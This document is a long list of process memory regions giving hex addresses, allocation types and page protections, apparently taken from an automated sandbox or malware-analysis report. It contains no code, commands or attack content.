trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
4571000
trusted library allocation
page read and write
1A3310F6000
heap
page read and write
351E000
stack
page read and write
FD0000
remote allocation
page read and write
8D80000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
1FA26E50000
heap
page read and write
8EA0000
trusted library allocation
page execute and read and write
50F1000
trusted library allocation
page read and write
125FCA53000
heap
page read and write
B421000
trusted library allocation
page read and write
9C34000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8EB0000
unkown
page read and write
8E80000
unkown
page read and write
AB20000
trusted library allocation
page read and write
2330000
unkown
page readonly
9C80000
trusted library allocation
page read and write
9033000
trusted library allocation
page read and write
125FCA5C000
heap
page read and write
9C50000
trusted library allocation
page read and write
16717800000
heap
page read and write
9C30000
trusted library allocation
page read and write
4950000
trusted library allocation
page read and write
897000
direct allocation
page read and write
977000
heap
page read and write
2BB0000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
7340000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
819C67E000
stack
page read and write
8F30000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
91E0000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
1B54EE49000
heap
page read and write
8DE5000
unkown
page read and write
8CE0000
trusted library allocation
page read and write
50A3000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
93C000
heap
page read and write
AB80000
trusted library allocation
page read and write
1A3310FA000
heap
page read and write
4A90000
trusted library allocation
page read and write
71FE000
stack
page read and write
8CB6000
trusted library allocation
page read and write
B8F000
heap
page read and write
284E000
stack
page read and write
52E0000
trusted library allocation
page read and write
A7E5FFE000
stack
page read and write
5D81000
heap
page read and write
9CA0000
trusted library allocation
page read and write
90EA2FF000
stack
page read and write
14CD5841000
heap
page read and write
4EE0000
trusted library allocation
page read and write
7D70000
trusted library allocation
page read and write
8CC8000
trusted library allocation
page read and write
28DD5300000
heap
page read and write
9C70000
trusted library allocation
page read and write
16717868000
heap
page read and write
8E1A000
trusted library allocation
page read and write
5E0000
trusted library allocation
page read and write
940000
heap
page read and write
8E10000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
2230F45A000
heap
page read and write
8EA0000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
107E000
stack
page read and write
1E0000
heap
page read and write
101E000
stack
page read and write
7DC0000
unkown
page read and write
5667000
trusted library allocation
page read and write
7DD6000
trusted library allocation
page read and write
B54000
heap
page read and write
AB30000
trusted library allocation
page read and write
9C000
stack
page read and write
5055000
trusted library allocation
page read and write
153A97E000
stack
page read and write
6DD0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
7DDD000
trusted library allocation
page read and write
E85000
heap
page read and write
4AFF000
stack
page read and write
9C98000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
AD2B000
trusted library allocation
page read and write
5490000
direct allocation
page read and write
8CB7000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
5CE0000
heap
page read and write
8E80000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
5530000
direct allocation
page read and write
507C000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
9C68000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page execute and read and write
400000
unkown
page readonly
802C000
direct allocation
page read and write
6D4000
heap
page read and write
7DC0000
trusted library allocation
page read and write
6D20000
trusted library allocation
page execute and read and write
8DE0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
14CD5861000
heap
page read and write
8CB0000
trusted library allocation
page read and write
98A000
heap
page read and write
6BE0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
8F70000
unkown
page read and write
7A20000
trusted library allocation
page read and write
14CD5885000
heap
page read and write
1A32B83C000
heap
page read and write
8CB0000
trusted library allocation
page read and write
8D65000
trusted library allocation
page read and write
28DD5302000
heap
page read and write
C0E000
stack
page read and write
7ED0000
trusted library allocation
page read and write
9C39000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
5030000
trusted library allocation
page read and write
7F00000
trusted library allocation
page read and write
43F0000
heap
page read and write
8F20000
trusted library allocation
page read and write
8B0000
direct allocation
page read and write
C11000
heap
page read and write
9CE0000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
B97000
heap
page read and write
4A3D000
stack
page read and write
8E70000
trusted library allocation
page read and write
9D10000
trusted library allocation
page read and write
4E0000
heap
page read and write
8F50000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
7DC9000
unkown
page read and write
7EE0000
trusted library allocation
page read and write
2A08000
heap
page read and write
6B80000
trusted library allocation
page read and write
2CA3A1F0000
remote allocation
page read and write
8D70000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
9BC000
stack
page read and write
8E40000
trusted library allocation
page read and write
89BF000
stack
page read and write
14CD586A000
heap
page read and write
9C60000
trusted library allocation
page read and write
AC40000
trusted library allocation
page read and write
BB7000
heap
page read and write
9030000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
72BD000
trusted library allocation
page read and write
C27000
heap
page read and write
5570000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
2230F467000
heap
page read and write
9080000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
AB00000
trusted library allocation
page read and write
5550000
direct allocation
page read and write
7ED6000
trusted library allocation
page read and write
A93E000
trusted library allocation
page read and write
8DE2000
trusted library allocation
page read and write
918000
heap
page read and write
8D80000
unkown
page read and write
8CB5000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
9000000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4C10000
heap
page read and write
B7E000
stack
page read and write
14CD5846000
heap
page read and write
5FE000
stack
page read and write
1A3310AE000
heap
page read and write
9246000
trusted library allocation
page read and write
8CF5000
trusted library allocation
page read and write
B9E000
heap
page read and write
937E000
unkown
page read and write
2CA3A25F000
heap
page read and write
8F00000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
4602000
unkown
page read and write
7AC000
stack
page read and write
6C80000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
5641000
trusted library allocation
page read and write
90E991B000
stack
page read and write
3430000
heap
page read and write
89E000
stack
page read and write
ED9C4FD000
stack
page read and write
8E10000
trusted library allocation
page read and write
C0B000
heap
page read and write
9CC0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
A95E000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9C51000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
1A32B5E0000
heap
page read and write
1A33101E000
heap
page read and write
AB70000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
4566000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
23BE000
stack
page read and write
9F9000
stack
page read and write
28DD5213000
heap
page read and write
8E15000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
4830000
heap
page read and write
1A32B877000
heap
page read and write
558F000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8FA0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
2E40000
unkown
page readonly
7DD0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
810000
direct allocation
page read and write
AB10000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9C60000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8D70000
unkown
page read and write
7DD0000
unkown
page read and write
AB50000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
2230FC80000
trusted library allocation
page read and write
125FCB13000
heap
page read and write
72BC000
trusted library allocation
page read and write
A3D000
stack
page read and write
AB20000
trusted library allocation
page read and write
8CB5000
trusted library allocation
page read and write
AB70000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
28DD5251000
heap
page read and write
8FE7000
trusted library allocation
page read and write
819C77E000
stack
page read and write
29A5C080000
heap
page read and write
AC80000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
496D000
trusted library allocation
page execute and read and write
8E10000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
6B00000
direct allocation
page read and write
1FA26E13000
heap
page read and write
9EB0000
trusted library allocation
page read and write
9C10000
trusted library allocation
page execute and read and write
7DC6000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
8DD0000
unkown
page read and write
8E00000
trusted library allocation
page read and write
979000
heap
page read and write
8E50000
trusted library allocation
page read and write
1A32B902000
heap
page read and write
9010000
trusted library allocation
page read and write
8F30000
trusted library allocation
page execute and read and write
B002000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
5692000
trusted library allocation
page read and write
710000
heap
page read and write
1A331048000
heap
page read and write
509E000
stack
page read and write
9CA0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
E0F000
stack
page read and write
C1D000
heap
page read and write
4940000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
887E000
stack
page read and write
9110000
unkown
page read and write
1A33103B000
heap
page read and write
ED9BD6E000
stack
page read and write
D5E000
stack
page read and write
14CD5842000
heap
page read and write
37DB67F000
stack
page read and write
14CD5875000
heap
page read and write
6BE000
stack
page read and write
FA7000
stack
page read and write
7D80000
trusted library allocation
page read and write
153A47C000
stack
page read and write
94FF000
unkown
page read and write
B017000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
14CD5857000
heap
page read and write
4960000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
8E0000
heap
page read and write
AB40000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
AB35000
trusted library allocation
page read and write
2A10000
heap
page read and write
C08000
heap
page read and write
AB50000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
55F3000
heap
page read and write
37DB77F000
stack
page read and write
7DC0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
A50000
unkown
page execute and read and write
8ED0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
A8F4000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
20000
heap
page read and write
9CB0000
trusted library allocation
page read and write
4576000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
6CDC000
trusted library allocation
page read and write
29A5C23A000
heap
page read and write
8DA0000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
AC00000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8CE5000
trusted library allocation
page read and write
98A000
heap
page read and write
998000
heap
page read and write
8DF0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
4571000
trusted library allocation
page read and write
CA142FE000
stack
page read and write
9010000
trusted library allocation
page read and write
883F000
stack
page read and write
8D20000
trusted library allocation
page read and write
559B000
heap
page read and write
AB20000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
63E000
stack
page read and write
4E93000
trusted library allocation
page read and write
F6E000
stack
page read and write
28EA5713000
heap
page read and write
14CD5845000
heap
page read and write
6D10000
heap
page read and write
819C87D000
stack
page read and write
8D90000
trusted library allocation
page read and write
F90000
remote allocation
page read and write
50E0000
trusted library allocation
page read and write
8FA0000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
90E9F7B000
stack
page read and write
8E10000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
8BE000
stack
page read and write
7F10000
trusted library allocation
page read and write
6D35000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8F33000
trusted library allocation
page read and write
978000
heap
page read and write
1B54ED80000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
76B000
stack
page read and write
620000
remote allocation
page read and write
AB50000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
6C40000
trusted library allocation
page read and write
4A2D000
trusted library allocation
page read and write
AE0000
heap
page read and write
B85000
heap
page read and write
14CD5858000
heap
page read and write
7DD0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
8E50000
unkown
page read and write
850000
direct allocation
page read and write
2BD0000
heap
page read and write
8C70000
trusted library allocation
page read and write
28EA56BC000
heap
page read and write
8DA0000
trusted library allocation
page read and write
43E0000
direct allocation
page read and write
8F90000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
C0B000
heap
page read and write
9CE0000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
29A0000
heap
page read and write
55DF000
heap
page read and write
F90000
remote allocation
page read and write
91F6000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8EDA000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
1A330DF0000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
2330000
unkown
page readonly
28EA5F12000
heap
page read and write
B259000
trusted library allocation
page read and write
9009000
trusted library allocation
page read and write
52DF000
stack
page read and write
9C90000
trusted library allocation
page read and write
8DF7000
trusted library allocation
page read and write
1A32C7E0000
trusted library allocation
page read and write
9CBD000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
9110000
unkown
page read and write
91C0000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
BC0000
heap
page read and write
2230F48D000
heap
page read and write
8ED0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
1A32C000000
heap
page read and write
8D80000
unkown
page read and write
EB2000
heap
page read and write
30000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
580000
remote allocation
page read and write
6CD0000
trusted library allocation
page read and write
125FCA83000
heap
page read and write
BB1000
heap
page read and write
9CE0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
B3C1000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
2230F460000
heap
page read and write
2A11000
heap
page read and write
8E90000
trusted library allocation
page read and write
ACF0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
A920000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
17D000
stack
page read and write
7ED0000
trusted library allocation
page read and write
660000
heap
page read and write
8E8000
heap
page read and write
7246000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
29A5C0F0000
heap
page read and write
4563000
trusted library allocation
page read and write
4BEF000
heap
page read and write
AB20000
trusted library allocation
page read and write
CA1437F000
stack
page read and write
8ED0000
trusted library allocation
page read and write
29A5C302000
heap
page read and write
2910000
heap
page read and write
1A32C8E0000
trusted library section
page readonly
9CC0000
trusted library allocation
page read and write
B5E000
stack
page read and write
9C80000
trusted library allocation
page read and write
7DC5000
trusted library allocation
page read and write
AC90000
trusted library allocation
page read and write
5033000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
6B68000
trusted library allocation
page read and write
55E0000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
29A5C1F0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
560E000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
5B78000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
9C36000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
819BF8B000
stack
page read and write
1A331000000
heap
page read and write
1A32C900000
trusted library section
page readonly
7DC5000
trusted library allocation
page read and write
ECB000
stack
page read and write
110000
trusted library allocation
page read and write
28DD5050000
heap
page read and write
73B0000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
6CD0000
trusted library allocation
page read and write
1FA26E00000
heap
page read and write
E40000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
5D5F000
heap
page read and write
1A330F30000
trusted library allocation
page read and write
ED9C2F7000
stack
page read and write
55DD000
heap
page read and write
6BE0000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8A2000
direct allocation
page read and write
7DC0000
unkown
page read and write
8DF1000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
6CD0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
9C87000
trusted library allocation
page read and write
51FD000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
AA0000
heap
page read and write
3240000
remote allocation
page read and write
1A32C159000
heap
page read and write
4576000
trusted library allocation
page read and write
2BAF000
stack
page read and write
8F79000
unkown
page read and write
BAF000
heap
page read and write
510000
trusted library allocation
page read and write
8DA0000
unkown
page read and write
DB0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
92D000
heap
page read and write
870000
direct allocation
page read and write
8CB0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
2CA3A241000
heap
page read and write
130000
heap
page read and write
7DD0000
trusted library allocation
page read and write
459D000
trusted library allocation
page read and write
978000
heap
page read and write
6DD0000
trusted library allocation
page read and write
14CD5902000
heap
page read and write
4565000
trusted library allocation
page read and write
230000
heap
page read and write
125FCA00000
heap
page read and write
E7E000
stack
page read and write
8D90000
trusted library allocation
page read and write
6D4000
heap
page read and write
5649000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
586E000
stack
page read and write
A900000
trusted library allocation
page read and write
100F000
stack
page read and write
9CF0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
2CA3A1F0000
remote allocation
page read and write
A49000
heap
page read and write
8D00000
unkown
page read and write
9070000
unkown
page read and write
7DC0000
trusted library allocation
page read and write
EF427E000
stack
page read and write
8D80000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
14CD587E000
heap
page read and write
55E5000
heap
page read and write
9CB0000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
9077000
trusted library allocation
page read and write
590000
heap
page read and write
1DB000
stack
page read and write
AB30000
trusted library allocation
page read and write
29A5C229000
heap
page read and write
8DA0000
trusted library allocation
page read and write
B88000
heap
page read and write
8D90000
trusted library allocation
page read and write
45A9000
trusted library allocation
page read and write
8CB8000
trusted library allocation
page read and write
5476000
direct allocation
page read and write
73D0000
trusted library allocation
page read and write
54D4000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
819CB7C000
stack
page read and write
8E20000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
546F000
heap
page read and write
55C6000
heap
page read and write
AB70000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
90EA97F000
stack
page read and write
8F30000
trusted library allocation
page read and write
7358000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
6DC0000
trusted library allocation
page read and write
32A4000
heap
page read and write
125FCA4E000
heap
page read and write
7DD7000
unkown
page read and write
3240000
remote allocation
page read and write
7EE0000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
7ED5000
trusted library allocation
page read and write
98A000
heap
page read and write
52BD000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
890000
direct allocation
page read and write
8CE0000
trusted library allocation
page read and write
BA9000
heap
page read and write
7D0000
remote allocation
page read and write
9053000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
6F20000
trusted library allocation
page read and write
28DD5240000
heap
page read and write
9CB0000
trusted library allocation
page read and write
B496000
trusted library allocation
page read and write
93E000
heap
page read and write
9C60000
trusted library section
page read and write
8DE0000
unkown
page read and write
9020000
trusted library allocation
page read and write
4D10000
trusted library allocation
page read and write
2230F45D000
heap
page read and write
4AB0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
6C40000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
B46E000
trusted library allocation
page read and write
F6D000
stack
page read and write
72AA000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
2C50000
heap
page read and write
9000000
trusted library allocation
page read and write
1A330CE0000
trusted library allocation
page read and write
EAF000
heap
page read and write
1B54EE4A000
heap
page read and write
8E10000
trusted library allocation
page read and write
7EE0000
unkown
page read and write
7DC5000
unkown
page read and write
8EA0000
trusted library allocation
page read and write
1A32B86F000
heap
page read and write
8CD0000
trusted library allocation
page execute and read and write
8EC0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
91D0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
B4AE000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
1B54EBD0000
heap
page read and write
4540000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
9113000
unkown
page read and write
6B80000
trusted library allocation
page read and write
125FC830000
heap
page read and write
8D20000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
85F000
stack
page read and write
AB20000
trusted library allocation
page read and write
484F000
unkown
page read and write
1A331061000
heap
page read and write
FD0D8FF000
stack
page read and write
CD0000
heap
page read and write
28DD5228000
heap
page read and write
8D95000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1B54EE5A000
heap
page read and write
8F17000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
4B8000
heap
page read and write
8D1C000
trusted library allocation
page read and write
57E000
stack
page read and write
5542000
trusted library allocation
page read and write
44F1000
unkown
page execute read
8CB0000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
28DD5273000
heap
page read and write
6B80000
trusted library allocation
page read and write
9CD0000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
8CB0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
B9F000
heap
page read and write
AB30000
trusted library allocation
page read and write
1A331010000
heap
page read and write
2A67000
heap
page read and write
8D60000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
1A3310D6000
heap
page read and write
9D10000
trusted library allocation
page read and write
29A8000
heap
page read and write
AB80000
trusted library allocation
page read and write
4A10000
direct allocation
page execute and read and write
B80000
remote allocation
page read and write
4ED4000
trusted library allocation
page read and write
263E000
stack
page read and write
9C50000
trusted library allocation
page read and write
1FA26D00000
trusted library allocation
page read and write
8DD0000
unkown
page read and write
14CD5813000
heap
page read and write
8F20000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
947000
heap
page read and write
1A32B7C1000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
1B54EE2A000
heap
page read and write
8E20000
trusted library allocation
page read and write
4FCE000
stack
page read and write
56F6000
trusted library allocation
page read and write
446F000
stack
page read and write
DED000
stack
page read and write
6B60000
trusted library allocation
page read and write
7F00000
trusted library allocation
page read and write
6D0000
heap
page read and write
9C20000
trusted library allocation
page read and write
16717690000
heap
page read and write
8E10000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
B3F1000
trusted library allocation
page read and write
6C10000
trusted library allocation
page execute and read and write
8F10000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
AB90000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
BA8000
heap
page read and write
8EE0000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
941000
heap
page read and write
6CF3000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
2230F457000
heap
page read and write
2230F486000
heap
page read and write
8094000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
5B92000
trusted library allocation
page read and write
7DCF000
unkown
page read and write
9140000
trusted library allocation
page read and write
7ED7000
trusted library allocation
page read and write
C02000
heap
page read and write
9C90000
trusted library allocation
page read and write
B477000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
B49E000
trusted library allocation
page read and write
73C0000
trusted library allocation
page execute and read and write
9ECC000
trusted library allocation
page read and write
55C000
stack
page read and write
550000
heap
page read and write
9190000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
ED9C1F9000
stack
page read and write
96E000
heap
page read and write
AB10000
trusted library allocation
page read and write
803C000
direct allocation
page read and write
7F00000
trusted library allocation
page execute and read and write
AB60000
trusted library allocation
page read and write
933D000
unkown
page read and write
8EE0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8D95000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
28DD5313000
heap
page read and write
ED9BCEC000
stack
page read and write
7F15000
trusted library allocation
page read and write
A28000
heap
page read and write
71A000
heap
page read and write
4271000
unkown
page execute read
9CA0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
6DE0000
trusted library allocation
page read and write
53F0000
heap
page read and write
EC0000
heap
page read and write
8E10000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
9C35000
trusted library allocation
page read and write
5160000
heap
page read and write
7DD0000
trusted library allocation
page read and write
6D20000
trusted library allocation
page read and write
1FA26E8A000
heap
page read and write
B4CE000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
6C30000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
5BC6000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
6C60000
trusted library allocation
page read and write
29A5C249000
heap
page read and write
8CD0000
trusted library allocation
page read and write
2CA3A190000
heap
page read and write
CA1447B000
stack
page read and write
9EB0000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
1A330E11000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
4982000
trusted library allocation
page read and write
8F60000
unkown
page read and write
8D85000
trusted library allocation
page read and write
33DE000
stack
page read and write
AB40000
trusted library allocation
page read and write
55AC000
heap
page read and write
1A3310F8000
heap
page read and write
8D90000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
125FCB08000
heap
page read and write
2230F44E000
heap
page read and write
8E50000
trusted library allocation
page read and write
A7E5DFF000
stack
page read and write
73D0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
4B92000
trusted library allocation
page read and write
52D8000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
6B60000
trusted library section
page read and write
8EE0000
trusted library allocation
page read and write
9C8E000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
2230F46A000
heap
page read and write
AB40000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
5A6E000
stack
page read and write
7DC0000
unkown
page read and write
A7E536B000
stack
page read and write
6F0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
9160000
unkown
page read and write
819C97C000
stack
page read and write
8CB0000
trusted library allocation
page read and write
1A331088000
heap
page read and write
7DD5000
unkown
page read and write
8DA0000
trusted library allocation
page read and write
1090000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
7DD9000
trusted library allocation
page read and write
8EC5000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
2CA3A202000
heap
page read and write
8CB0000
trusted library allocation
